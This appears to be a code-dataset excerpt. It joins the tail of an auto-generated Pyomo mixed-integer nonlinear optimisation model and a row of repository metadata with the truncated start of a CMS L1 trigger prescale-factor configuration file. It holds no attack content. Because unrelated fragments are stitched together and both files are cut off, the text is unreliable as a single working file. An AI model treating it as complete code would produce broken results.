m.x85)*m.x49 - m.x86*m.x69 - 80*m.b18 - 1000*m.b6 + 1000*m.b30 >= 1000)
m.c44 = Constraint(expr=(100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*
m.x48 + m.x86*m.x72 - (100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x50 - m.x86*m.x70 - 20*m.b18 - 1000*m.b6 + 1000*m.b30 >= 1000)
m.c45 = Constraint(expr=(100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x49 + m.x86*
m.x73 - (100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x51 - m.x86*m.x71
- 80*m.b19 - 1000*m.b7 + 1000*m.b31 >= 1000)
m.c46 = Constraint(expr=(100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x50 + m.x86*
m.x74 - (100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x52 - m.x86*m.x72
- 20*m.b19 - 1000*m.b7 + 1000*m.b31 >= 1000)
m.c47 = Constraint(expr=(100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x51 + m.x86*m.x75 - (100*
m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x53 - m.x86*m.x73 - 80*m.b20 - 1000*m.b8
+ 1000*m.b32 >= 1000)
m.c48 = Constraint(expr=(100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x52 + m.x86*m.x76 - (100*
m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x54 - m.x86*m.x74 - 20*m.b20 - 1000*m.b8
+ 1000*m.b32 >= 1000)
m.c49 = Constraint(expr=(100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x53 + m.x86*m.x77 - (100*m.b22 + 100*
m.b23 + 100*m.b24 + m.x85)*m.x55 - m.x86*m.x75 - 80*m.b21 - 1000*m.b9 + 1000*m.b33 >= 1000)
m.c50 = Constraint(expr=(100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x54 + m.x86*m.x78 - (100*m.b22 + 100*
m.b23 + 100*m.b24 + m.x85)*m.x56 - m.x86*m.x76 - 20*m.b21 - 1000*m.b9 + 1000*m.b33 >= 1000)
m.c51 = Constraint(expr=(100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x55 + m.x86*m.x79 - (100*m.b23 + 100*m.b24 + m.x85
)*m.x57 - m.x86*m.x77 - 80*m.b22 - 1000*m.b10 + 1000*m.b34 >= 1000)
m.c52 = Constraint(expr=(100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x56 + m.x86*m.x80 - (100*m.b23 + 100*m.b24 + m.x85
)*m.x58 - m.x86*m.x78 - 20*m.b22 - 1000*m.b10 + 1000*m.b34 >= 1000)
m.c53 = Constraint(expr=(100*m.b23 + 100*m.b24 + m.x85)*m.x57 + m.x86*m.x81 - (100*m.b24 + m.x85)*m.x59 - m.x86*m.x79 -
80*m.b23 - 1000*m.b11 + 1000*m.b35 >= 1000)
m.c54 = Constraint(expr=(100*m.b23 + 100*m.b24 + m.x85)*m.x58 + m.x86*m.x82 - (100*m.b24 + m.x85)*m.x60 - m.x86*m.x80 -
20*m.b23 - 1000*m.b11 + 1000*m.b35 >= 1000)
m.c55 = Constraint(expr=m.x85*m.x39 + m.x87*m.x63 - m.x86*m.x61 + 1000*m.b2 <= 1000)
m.c56 = Constraint(expr=m.x85*m.x40 + m.x87*m.x64 - m.x86*m.x62 + 1000*m.b2 <= 1000)
m.c57 = Constraint(expr=m.x85*m.x41 + m.x87*m.x65 - m.x86*m.x63 + 1000*m.b3 <= 1000)
m.c58 = Constraint(expr=m.x85*m.x42 + m.x87*m.x66 - m.x86*m.x64 + 1000*m.b3 <= 1000)
m.c59 = Constraint(expr=m.x85*m.x43 + m.x87*m.x67 - m.x86*m.x65 + 1000*m.b4 <= 1000)
m.c60 = Constraint(expr=m.x85*m.x44 + m.x87*m.x68 - m.x86*m.x66 + 1000*m.b4 <= 1000)
m.c61 = Constraint(expr=m.x85*m.x45 + m.x87*m.x69 - m.x86*m.x67 + 1000*m.b5 <= 1000)
m.c62 = Constraint(expr=m.x85*m.x46 + m.x87*m.x70 - m.x86*m.x68 + 1000*m.b5 <= 1000)
m.c63 = Constraint(expr=m.x85*m.x47 + m.x87*m.x71 - m.x86*m.x69 + 1000*m.b6 <= 1000)
m.c64 = Constraint(expr=m.x85*m.x48 + m.x87*m.x72 - m.x86*m.x70 + 1000*m.b6 <= 1000)
m.c65 = Constraint(expr=m.x85*m.x49 + m.x87*m.x73 - m.x86*m.x71 + 1000*m.b7 <= 1000)
m.c66 = Constraint(expr=m.x85*m.x50 + m.x87*m.x74 - m.x86*m.x72 + 1000*m.b7 <= 1000)
m.c67 = Constraint(expr=m.x85*m.x51 + m.x87*m.x75 - m.x86*m.x73 + 1000*m.b8 <= 1000)
m.c68 = Constraint(expr=m.x85*m.x52 + m.x87*m.x76 - m.x86*m.x74 + 1000*m.b8 <= 1000)
m.c69 = Constraint(expr=m.x85*m.x53 + m.x87*m.x77 - m.x86*m.x75 + 1000*m.b9 <= 1000)
m.c70 = Constraint(expr=m.x85*m.x54 + m.x87*m.x78 - m.x86*m.x76 + 1000*m.b9 <= 1000)
m.c71 = Constraint(expr=m.x85*m.x55 + m.x87*m.x79 - m.x86*m.x77 + 1000*m.b10 <= 1000)
m.c72 = Constraint(expr=m.x85*m.x56 + m.x87*m.x80 - m.x86*m.x78 + 1000*m.b10 <= 1000)
m.c73 = Constraint(expr=m.x85*m.x57 + m.x87*m.x81 - m.x86*m.x79 + 1000*m.b11 <= 1000)
m.c74 = Constraint(expr=m.x85*m.x58 + m.x87*m.x82 - m.x86*m.x80 + 1000*m.b11 <= 1000)
m.c75 = Constraint(expr=m.x85*m.x59 + m.x87*m.x83 - m.x86*m.x81 + 1000*m.b12 <= 1000)
m.c76 = Constraint(expr=m.x85*m.x60 + m.x87*m.x84 - m.x86*m.x82 + 1000*m.b12 <= 1000)
m.c77 = Constraint(expr=m.x85*m.x39 + m.x87*m.x63 - m.x86*m.x61 - 1000*m.b2 >= -1000)
m.c78 = Constraint(expr=m.x85*m.x40 + m.x87*m.x64 - m.x86*m.x62 - 1000*m.b2 >= -1000)
m.c79 = Constraint(expr=m.x85*m.x41 + m.x87*m.x65 - m.x86*m.x63 - 1000*m.b3 >= -1000)
m.c80 = Constraint(expr=m.x85*m.x42 + m.x87*m.x66 - m.x86*m.x64 - 1000*m.b3 >= -1000)
m.c81 = Constraint(expr=m.x85*m.x43 + m.x87*m.x67 - m.x86*m.x65 - 1000*m.b4 >= -1000)
m.c82 = Constraint(expr=m.x85*m.x44 + m.x87*m.x68 - m.x86*m.x66 - 1000*m.b4 >= -1000)
m.c83 = Constraint(expr=m.x85*m.x45 + m.x87*m.x69 - m.x86*m.x67 - 1000*m.b5 >= -1000)
m.c84 = Constraint(expr=m.x85*m.x46 + m.x87*m.x70 - m.x86*m.x68 - 1000*m.b5 >= -1000)
m.c85 = Constraint(expr=m.x85*m.x47 + m.x87*m.x71 - m.x86*m.x69 - 1000*m.b6 >= -1000)
m.c86 = Constraint(expr=m.x85*m.x48 + m.x87*m.x72 - m.x86*m.x70 - 1000*m.b6 >= -1000)
m.c87 = Constraint(expr=m.x85*m.x49 + m.x87*m.x73 - m.x86*m.x71 - 1000*m.b7 >= -1000)
m.c88 = Constraint(expr=m.x85*m.x50 + m.x87*m.x74 - m.x86*m.x72 - 1000*m.b7 >= -1000)
m.c89 = Constraint(expr=m.x85*m.x51 + m.x87*m.x75 - m.x86*m.x73 - 1000*m.b8 >= -1000)
m.c90 = Constraint(expr=m.x85*m.x52 + m.x87*m.x76 - m.x86*m.x74 - 1000*m.b8 >= -1000)
m.c91 = Constraint(expr=m.x85*m.x53 + m.x87*m.x77 - m.x86*m.x75 - 1000*m.b9 >= -1000)
m.c92 = Constraint(expr=m.x85*m.x54 + m.x87*m.x78 - m.x86*m.x76 - 1000*m.b9 >= -1000)
m.c93 = Constraint(expr=m.x85*m.x55 + m.x87*m.x79 - m.x86*m.x77 - 1000*m.b10 >= -1000)
m.c94 = Constraint(expr=m.x85*m.x56 + m.x87*m.x80 - m.x86*m.x78 - 1000*m.b10 >= -1000)
m.c95 = Constraint(expr=m.x85*m.x57 + m.x87*m.x81 - m.x86*m.x79 - 1000*m.b11 >= -1000)
m.c96 = Constraint(expr=m.x85*m.x58 + m.x87*m.x82 - m.x86*m.x80 - 1000*m.b11 >= -1000)
m.c97 = Constraint(expr=m.x85*m.x59 + m.x87*m.x83 - m.x86*m.x81 - 1000*m.b12 >= -1000)
m.c98 = Constraint(expr=m.x85*m.x60 + m.x87*m.x84 - m.x86*m.x82 - 1000*m.b12 >= -1000)
m.c99 = Constraint(expr=-m.x88*m.x87 + m.x85 == 0)
m.c100 = Constraint(expr= m.b13 + m.b14 + m.b15 + m.b16 + m.b17 + m.b18 + m.b19 + m.b20 + m.b21 + m.b22 + m.b23
+ m.b24 == 1)
m.c101 = Constraint(expr= m.b1 + m.b2 + m.b3 + m.b4 + m.b5 + m.b6 + m.b7 + m.b8 + m.b9 + m.b10 + m.b11 + m.b12 == 1)
m.c102 = Constraint(expr= m.b25 + m.b26 + m.b27 + m.b28 + m.b29 + m.b30 + m.b31 + m.b32 + m.b33 + m.b34 + m.b35
+ m.b36 == 12)
m.c103 = Constraint(expr= m.b1 + 2*m.b2 + 3*m.b3 + 4*m.b4 + 5*m.b5 + 6*m.b6 + 7*m.b7 + 8*m.b8 + 9*m.b9 + 10*m.b10
+ 11*m.b11 + 12*m.b12 == 12)
m.c104 = Constraint(expr= - m.b1 - 2*m.b2 - 3*m.b3 - 4*m.b4 - 5*m.b5 - 6*m.b6 - 7*m.b7 - 8*m.b8 - 9*m.b9 - 10*m.b10
- 11*m.b11 - 12*m.b12 + m.b13 + 2*m.b14 + 3*m.b15 + 4*m.b16 + 5*m.b17 + 6*m.b18 + 7*m.b19
+ 8*m.b20 + 9*m.b21 + 10*m.b22 + 11*m.b23 + 12*m.b24 <= 0)
m.c105 = Constraint(expr= m.b1 - m.b25 <= 0)
m.c106 = Constraint(expr= m.b2 - m.b26 <= 0)
m.c107 = Constraint(expr= m.b3 - m.b27 <= 0)
m.c108 = Constraint(expr= m.b4 - m.b28 <= 0)
m.c109 = Constraint(expr= m.b5 - m.b29 <= 0)
m.c110 = Constraint(expr= m.b6 - m.b30 <= 0)
m.c111 = Constraint(expr= m.b7 - m.b31 <= 0)
m.c112 = Constraint(expr= m.b8 - m.b32 <= 0)
m.c113 = Constraint(expr= m.b9 - m.b33 <= 0)
m.c114 = Constraint(expr= m.b10 - m.b34 <= 0)
m.c115 = Constraint(expr= m.b11 - m.b35 <= 0)
m.c116 = Constraint(expr= m.b12 - m.b36 <= 0)
m.c117 = Constraint(expr= m.b13 - m.b25 <= 0)
m.c118 = Constraint(expr= m.b14 - m.b26 <= 0)
m.c119 = Constraint(expr= m.b15 - m.b27 <= 0)
m.c120 = Constraint(expr= m.b16 - m.b28 <= 0)
m.c121 = Constraint(expr= m.b17 - m.b29 <= 0)
m.c122 = Constraint(expr= m.b18 - m.b30 <= 0)
m.c123 = Constraint(expr= m.b19 - m.b31 <= 0)
m.c124 = Constraint(expr= m.b20 - m.b32 <= 0)
m.c125 = Constraint(expr= m.b21 - m.b33 <= 0)
m.c126 = Constraint(expr= m.b22 - m.b34 <= 0)
m.c127 = Constraint(expr= m.b23 - m.b35 <= 0)
m.c128 = Constraint(expr= m.b24 - m.b36 <= 0)
m.c129 = Constraint(expr= - m.b1 - m.b2 - m.b3 - m.b4 - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b25
<= 0)
m.c130 = Constraint(expr= - m.b2 - m.b3 - m.b4 - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b26 <= 0)
m.c131 = Constraint(expr= - m.b3 - m.b4 - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b27 <= 0)
m.c132 = Constraint(expr= - m.b4 - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b28 <= 0)
m.c133 = Constraint(expr= - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b29 <= 0)
m.c134 = Constraint(expr= - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b30 <= 0)
m.c135 = Constraint(expr= - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b31 <= 0)
m.c136 = Constraint(expr= - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b32 <= 0)
m.c137 = Constraint(expr= - m.b9 - m.b10 - m.b11 - m.b12 + m.b33 <= 0)
m.c138 = Constraint(expr= - m.b10 - m.b11 - m.b12 + m.b34 <= 0)
m.c139 = Constraint(expr= - m.b11 - m.b12 + m.b35 <= 0)
m.c140 = Constraint(expr= - m.b12 + m.b36 <= 0)
m.c141 = Constraint(expr= - m.b25 - m.x61 - m.x62 <= 0)
m.c142 = Constraint(expr= - m.b26 - m.x63 - m.x64 <= 0)
m.c143 = Constraint(expr= - m.b27 - m.x65 - m.x66 <= 0)
m.c144 = Constraint(expr= - m.b28 - m.x67 - m.x68 <= 0)
m.c145 = Constraint(expr= - m.b29 - m.x69 - m.x70 <= 0)
m.c146 = Constraint(expr= - m.b30 - m.x71 - m.x72 <= 0)
m.c147 = Constraint(expr= - m.b31 - m.x73 - m.x74 <= 0)
m.c148 = Constraint(expr= - m.b32 - m.x75 - m.x76 <= 0)
m.c149 = Constraint(expr= - m.b33 - m.x77 - m.x78 <= 0)
m.c150 = Constraint(expr= - m.b34 - m.x79 - m.x80 <= 0)
m.c151 = Constraint(expr= - m.b35 - m.x81 - m.x82 <= 0)
m.c152 = Constraint(expr= - m.b36 - m.x83 - m.x84 <= 0)
m.c153 = Constraint(expr= m.b25 - m.x61 - m.x62 <= 0)
m.c154 = Constraint(expr= m.b26 - m.x63 - m.x64 <= 0)
m.c155 = Constraint(expr= m.b27 - m.x65 - m.x66 <= 0)
m.c156 = Constraint(expr= m.b28 - m.x67 - m.x68 <= 0)
m.c157 = Constraint(expr= m.b29 - m.x69 - m.x70 <= 0)
m.c158 = Constraint(expr= m.b30 - m.x71 - m.x72 <= 0)
m.c159 = Constraint(expr= m.b31 - m.x73 - m.x74 <= 0)
m.c160 = Constraint(expr= m.b32 - m.x75 - m.x76 <= 0)
m.c161 = Constraint(expr= m.b33 - m.x77 - m.x78 <= 0)
m.c162 = Constraint(expr= m.b34 - m.x79 - m.x80 <= 0)
m.c163 = Constraint(expr= m.b35 - m.x81 - m.x82 <= 0)
m.c164 = Constraint(expr= m.b36 - m.x83 - m.x84 <= 0)
m.c165 = Constraint(expr= - m.b25 - m.x37 - m.x38 <= 0)
m.c166 = Constraint(expr= - m.b26 - m.x39 - m.x40 <= 0)
m.c167 = Constraint(expr= - m.b27 - m.x41 - m.x42 <= 0)
m.c168 = Constraint(expr= - m.b28 - m.x43 - m.x44 <= 0)
m.c169 = Constraint(expr= - m.b29 - m.x45 - m.x46 <= 0)
m.c170 = Constraint(expr= - m.b30 - m.x47 - m.x48 <= 0)
m.c171 = Constraint(expr= - m.b31 - m.x49 - m.x50 <= 0)
m.c172 = Constraint(expr= - m.b32 - m.x51 - m.x52 <= 0)
m.c173 = Constraint(expr= - m.b33 - m.x53 - m.x54 <= 0)
m.c174 = Constraint(expr= - m.b34 - m.x55 - m.x56 <= 0)
m.c175 = Constraint(expr= - m.b35 - m.x57 - m.x58 <= 0)
m.c176 = Constraint(expr= - m.b36 - m.x59 - m.x60 <= 0)
m.c177 = Constraint(expr= m.b25 - m.x37 - m.x38 <= 0)
m.c178 = Constraint(expr= m.b26 - m.x39 - m.x40 <= 0)
m.c179 = Constraint(expr= m.b27 - m.x41 - m.x42 <= 0)
m.c180 = Constraint(expr= m.b28 - m.x43 - m.x44 <= 0)
m.c181 = Constraint(expr= m.b29 - m.x45 - m.x46 <= 0)
m.c182 = Constraint(expr= m.b30 - m.x47 - m.x48 <= 0)
m.c183 = Constraint(expr= m.b31 - m.x49 - m.x50 <= 0)
m.c184 = Constraint(expr= m.b32 - m.x51 - m.x52 <= 0)
m.c185 = Constraint(expr= m.b33 - m.x53 - m.x54 <= 0)
m.c186 = Constraint(expr= m.b34 - m.x55 - m.x56 <= 0)
m.c187 = Constraint(expr= m.b35 - m.x57 - m.x58 <= 0)
m.c188 = Constraint(expr= m.b36 - m.x59 - m.x60 <= 0)
m.c189 = Constraint(expr= - m.b25 - m.x61 - m.x62 >= -2)
m.c190 = Constraint(expr= - m.b26 - m.x63 - m.x64 >= -2)
m.c191 = Constraint(expr= - m.b27 - m.x65 - m.x66 >= -2)
m.c192 = Constraint(expr= - m.b28 - m.x67 - m.x68 >= -2)
m.c193 = Constraint(expr= - m.b29 - m.x69 - m.x70 >= -2)
m.c194 = Constraint(expr= - m.b30 - m.x71 - m.x72 >= -2)
m.c195 = Constraint(expr= - m.b31 - m.x73 - m.x74 >= -2)
m.c196 = Constraint(expr= - m.b32 - m.x75 - m.x76 >= -2)
m.c197 = Constraint(expr= - m.b33 - m.x77 - m.x78 >= -2)
m.c198 = Constraint(expr= - m.b34 - m.x79 - m.x80 >= -2)
m.c199 = Constraint(expr= - m.b35 - m.x81 - m.x82 >= -2)
m.c200 = Constraint(expr= - m.b36 - m.x83 - m.x84 >= -2)
m.c201 = Constraint(expr= m.b25 - m.x61 - m.x62 >= -2)
m.c202 = Constraint(expr= m.b26 - m.x63 - m.x64 >= -2)
m.c203 = Constraint(expr= m.b27 - m.x65 - m.x66 >= -2)
m.c204 = Constraint(expr= m.b28 - m.x67 - m.x68 >= -2)
m.c205 = Constraint(expr= m.b29 - m.x69 - m.x70 >= -2)
m.c206 = Constraint(expr= m.b30 - m.x71 - m.x72 >= -2)
m.c207 = Constraint(expr= m.b31 - m.x73 - m.x74 >= -2)
m.c208 = Constraint(expr= m.b32 - m.x75 - m.x76 >= -2)
m.c209 = Constraint(expr= m.b33 - m.x77 - m.x78 >= -2)
m.c210 = Constraint(expr= m.b34 - m.x79 - m.x80 >= -2)
m.c211 = Constraint(expr= m.b35 - m.x81 - m.x82 >= -2)
m.c212 = Constraint(expr= m.b36 - m.x83 - m.x84 >= -2)
m.c213 = Constraint(expr= - m.b25 - m.x37 - m.x38 >= -2)
m.c214 = Constraint(expr= - m.b26 - m.x39 - m.x40 >= -2)
m.c215 = Constraint(expr= - m.b27 - m.x41 - m.x42 >= -2)
m.c216 = Constraint(expr= - m.b28 - m.x43 - m.x44 >= -2)
m.c217 = Constraint(expr= - m.b29 - m.x45 - m.x46 >= -2)
m.c218 = Constraint(expr= - m.b30 - m.x47 - m.x48 >= -2)
m.c219 = Constraint(expr= - m.b31 - m.x49 - m.x50 >= -2)
m.c220 = Constraint(expr= - m.b32 - m.x51 - m.x52 >= -2)
m.c221 = Constraint(expr= - m.b33 - m.x53 - m.x54 >= -2)
m.c222 = Constraint(expr= - m.b34 - m.x55 - m.x56 >= -2)
m.c223 = Constraint(expr= - m.b35 - m.x57 - m.x58 >= -2)
m.c224 = Constraint(expr= - m.b36 - m.x59 - m.x60 >= -2)
m.c225 = Constraint(expr= m.b25 - m.x37 - m.x38 >= -2)
m.c226 = Constraint(expr= m.b26 - m.x39 - m.x40 >= -2)
m.c227 = Constraint(expr= m.b27 - m.x41 - m.x42 >= -2)
m.c228 = Constraint(expr= m.b28 - m.x43 - m.x44 >= -2)
m.c229 = Constraint(expr= m.b29 - m.x45 - m.x46 >= -2)
m.c230 = Constraint(expr= m.b30 - m.x47 - m.x48 >= -2)
m.c231 = Constraint(expr= m.b31 - m.x49 - m.x50 >= -2)
m.c232 = Constraint(expr= m.b32 - m.x51 - m.x52 >= -2)
m.c233 = Constraint(expr= m.b33 - m.x53 - m.x54 >= -2)
m.c234 = Constraint(expr= m.b34 - m.x55 - m.x56 >= -2)
m.c235 = Constraint(expr= m.b35 - m.x57 - m.x58 >= -2)
m.c236 = Constraint(expr= m.b36 - m.x59 - m.x60 >= -2)
m.c237 = Constraint(expr=(m.x37 + 5.13435*m.x38)*m.x61 - m.x37 + 1000*m.b25 <= 1000)
m.c238 = Constraint(expr=(m.x37 + 5.13435*m.x38)*m.x62 - 5.13435*m.x38 + 1000*m.b25 <= 1000)
m.c239 = Constraint(expr=(m.x39 + 5.13435*m.x40)*m.x63 - m.x39 + 1000*m.b26 <= 1000)
m.c240 = Constraint(expr=(m.x39 + 5.13435*m.x40)*m.x64 - 5.13435*m.x40 + 1000*m.b26 <= 1000)
m.c241 = Constraint(expr=(m.x41 + 5.13435*m.x42)*m.x65 - m.x41 + 1000*m.b27 <= 1000)
m.c242 = Constraint(expr=(m.x41 + 5.13435*m.x42)*m.x66 - 5.13435*m.x42 + 1000*m.b27 <= 1000)
m.c243 = Constraint(expr=(m.x43 + 5.13435*m.x44)*m.x67 - m.x43 + 1000*m.b28 <= 1000)
m.c244 = Constraint(expr=(m.x43 + 5.13435*m.x44)*m.x68 - 5.13435*m.x44 + 1000*m.b28 <= 1000)
m.c245 = Constraint(expr=(m.x45 + 5.13435*m.x46)*m.x69 - m.x45 + 1000*m.b29 <= 1000)
m.c246 = Constraint(expr=(m.x45 + 5.13435*m.x46)*m.x70 - 5.13435*m.x46 + 1000*m.b29 <= 1000)
m.c247 = Constraint(expr=(m.x47 + 5.13435*m.x48)*m.x71 - m.x47 + 1000*m.b30 <= 1000)
m.c248 = Constraint(expr=(m.x47 + 5.13435*m.x48)*m.x72 - 5.13435*m.x48 + 1000*m.b30 <= 1000)
m.c249 = Constraint(expr=(m.x49 + 5.13435*m.x50)*m.x73 - m.x49 + 1000*m.b31 <= 1000)
m.c250 = Constraint(expr=(m.x49 + 5.13435*m.x50)*m.x74 - 5.13435*m.x50 + 1000*m.b31 <= 1000)
m.c251 = Constraint(expr=(m.x51 + 5.13435*m.x52)*m.x75 - m.x51 + 1000*m.b32 <= 1000)
m.c252 = Constraint(expr=(m.x51 + 5.13435*m.x52)*m.x76 - 5.13435*m.x52 + 1000*m.b32 <= 1000)
m.c253 = Constraint(expr=(m.x53 + 5.13435*m.x54)*m.x77 - m.x53 + 1000*m.b33 <= 1000)
m.c254 = Constraint(expr=(m.x53 + 5.13435*m.x54)*m.x78 - 5.13435*m.x54 + 1000*m.b33 <= 1000)
m.c255 = Constraint(expr=(m.x55 + 5.13435*m.x56)*m.x79 - m.x55 + 1000*m.b34 <= 1000)
m.c256 = Constraint(expr=(m.x55 + 5.13435*m.x56)*m.x80 - 5.13435*m.x56 + 1000*m.b34 <= 1000)
m.c257 = Constraint(expr=(m.x57 + 5.13435*m.x58)*m.x81 - m.x57 + 1000*m.b35 <= 1000)
m.c258 = Constraint(expr=(m.x57 + 5.13435*m.x58)*m.x82 - 5.13435*m.x58 + 1000*m.b35 <= 1000)
m.c259 = Constraint(expr=(m.x59 + 5.13435*m.x60)*m.x83 - m.x59 + 1000*m.b36 <= 1000)
m.c260 = Constraint(expr=(m.x59 + 5.13435*m.x60)*m.x84 - 5.13435*m.x60 + 1000*m.b36 <= 1000)
m.c261 = Constraint(expr=(m.x37 + 5.13435*m.x38)*m.x61 - m.x37 - 1000*m.b25 >= -1000)
m.c262 = Constraint(expr=(m.x37 + 5.13435*m.x38)*m.x62 - 5.13435*m.x38 - 1000*m.b25 >= -1000)
m.c263 = Constraint(expr=(m.x39 + 5.13435*m.x40)*m.x63 - m.x39 - 1000*m.b26 >= -1000)
m.c264 = Constraint(expr=(m.x39 + 5.13435*m.x40)*m.x64 - 5.13435*m.x40 - 1000*m.b26 >= -1000)
m.c265 = Constraint(expr=(m.x41 + 5.13435*m.x42)*m.x65 - m.x41 - 1000*m.b27 >= -1000)
m.c266 = Constraint(expr=(m.x41 + 5.13435*m.x42)*m.x66 - 5.13435*m.x42 - 1000*m.b27 >= -1000)
m.c267 = Constraint(expr=(m.x43 + 5.13435*m.x44)*m.x67 - m.x43 - 1000*m.b28 >= -1000)
m.c268 = Constraint(expr=(m.x43 + 5.13435*m.x44)*m.x68 - 5.13435*m.x44 - 1000*m.b28 >= -1000)
m.c269 = Constraint(expr=(m.x45 + 5.13435*m.x46)*m.x69 - m.x45 - 1000*m.b29 >= -1000)
m.c270 = Constraint(expr=(m.x45 + 5.13435*m.x46)*m.x70 - 5.13435*m.x46 - 1000*m.b29 >= -1000)
m.c271 = Constraint(expr=(m.x47 + 5.13435*m.x48)*m.x71 - m.x47 - 1000*m.b30 >= -1000)
m.c272 = Constraint(expr=(m.x47 + 5.13435*m.x48)*m.x72 - 5.13435*m.x48 - 1000*m.b30 >= -1000)
m.c273 = Constraint(expr=(m.x49 + 5.13435*m.x50)*m.x73 - m.x49 - 1000*m.b31 >= -1000)
m.c274 = Constraint(expr=(m.x49 + 5.13435*m.x50)*m.x74 - 5.13435*m.x50 - 1000*m.b31 >= -1000)
m.c275 = Constraint(expr=(m.x51 + 5.13435*m.x52)*m.x75 - m.x51 - 1000*m.b32 >= -1000)
m.c276 = Constraint(expr=(m.x51 + 5.13435*m.x52)*m.x76 - 5.13435*m.x52 - 1000*m.b32 >= -1000)
m.c277 = Constraint(expr=(m.x53 + 5.13435*m.x54)*m.x77 - m.x53 - 1000*m.b33 >= -1000)
m.c278 = Constraint(expr=(m.x53 + 5.13435*m.x54)*m.x78 - 5.13435*m.x54 - 1000*m.b33 >= -1000)
m.c279 = Constraint(expr=(m.x55 + 5.13435*m.x56)*m.x79 - m.x55 - 1000*m.b34 >= -1000)
m.c280 = Constraint(expr=(m.x55 + 5.13435*m.x56)*m.x80 - 5.13435*m.x56 - 1000*m.b34 >= -1000)
m.c281 = Constraint(expr=(m.x57 + 5.13435*m.x58)*m.x81 - m.x57 - 1000*m.b35 >= -1000)
m.c282 = Constraint(expr=(m.x57 + 5.13435*m.x58)*m.x82 - 5.13435*m.x58 - 1000*m.b35 >= -1000)
m.c283 = Constraint(expr=(m.x59 + 5.13435*m.x60)*m.x83 - m.x59 - 1000*m.b36 >= -1000)
m.c284 = Constraint(expr=(m.x59 + 5.13435*m.x60)*m.x84 - 5.13435*m.x60 - 1000*m.b36 >= -1000)
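# Solve sketch (assumption: a global MINLP solver such as Couenne or SCIP is
# installed locally; the generated model does not select one itself):
#   from pyomo.environ import SolverFactory
#   SolverFactory('couenne').solve(m, tee=True)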
| 47.032595 | 120 | 0.561596 | 7,316 | 36,074 | 2.769136 | 0.062466 | 0.095168 | 0.18066 | 0.074634 | 0.88109 | 0.84555 | 0.84555 | 0.844514 | 0.842144 | 0.69495 | 0 | 0.303117 | 0.212868 | 36,074 | 766 | 121 | 47.093995 | 0.410354 | 0.017353 | 0 | 0.104121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.002169 | 0 | 0.002169 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
35346ab97188a313a3f6b90ab1eb79b62637e26c | 1,652 | py | Python | L1TriggerConfig/L1GtConfigProducers/python/Luminosity/lumi1x1032/L1Menu2007_PrescaleFactorsAlgoTrig_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | L1TriggerConfig/L1GtConfigProducers/python/Luminosity/lumi1x1032/L1Menu2007_PrescaleFactorsAlgoTrig_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | L1TriggerConfig/L1GtConfigProducers/python/Luminosity/lumi1x1032/L1Menu2007_PrescaleFactorsAlgoTrig_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from L1TriggerConfig.L1GtConfigProducers.l1GtPrescaleFactorsAlgoTrig_cfi import *
l1GtPrescaleFactorsAlgoTrig.PrescaleFactorsSet = cms.VPSet(cms.PSet(
PrescaleFactors = cms.vint32(
1000000,
1000000,
100000,
100000,
100000,
100000,
100000,
10000,
10000,
1000,
100,
1,
1,
1,
1,
10000,
1000,
100,
100,
1,
1,
1,
10000,
10000,
100,
1,
1,
1,
10000,
1000,
1000,
1,
1,
1000,
100,
1,
1,
1,
1,
10000,
1,
1,
1,
1,
4000,
2000,
1,
1,
1,
1,
1,
1,
1000,
100,
100,
1,
1,
1,
1,
20,
1,
1,
1,
1,
1,
20,
1,
1,
1,
1,
1,
20,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
100,
1,
1,
1,
1,
1,
1,
1,
10000,
1,
1,
1,
